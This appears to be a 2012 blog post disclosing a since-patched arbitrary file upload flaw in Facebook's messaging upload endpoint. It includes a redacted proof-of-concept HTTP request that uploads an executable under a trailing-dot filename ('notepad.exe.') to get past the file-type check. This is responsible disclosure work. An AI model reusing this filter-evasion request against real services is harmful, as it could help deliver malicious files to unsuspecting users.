Thursday, May 3, 2012

Facebook Bug #2: Arbitrary File Upload Vulnerability Found in

Sow Ching Shiong, an independent vulnerability researcher has discovered an Arbitrary File Upload vulnerability in, which can be exploited by an attacker to compromise a victim's computer system.

Proof of concept
HTTP Request
POST /ajax/messaging/upload.php HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:7.0.1) Gecko/20100101 Firefox/7.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
DNT: 1
Proxy-Connection: keep-alive
Cookie: [information removed]
Content-Type: multipart/form-data; boundary=---------------------------265001916915724
Content-Length: 194200

Content-Disposition: form-data; name="post_form_id"

[information removed]
Content-Disposition: form-data; name="fb_dtsg"

[information removed]
Content-Disposition: form-data; name="id"

[information removed]
Content-Disposition: form-data; name="attachment"; filename="notepad.exe."
Content-Type: application/octet-stream

This vulnerability has been confirmed and patched by Facebook Security Team. I would like to thank them for their quick response to my report.

Facebook White Hat

No comments:

Post a Comment

Note: Only a member of this blog may post a comment.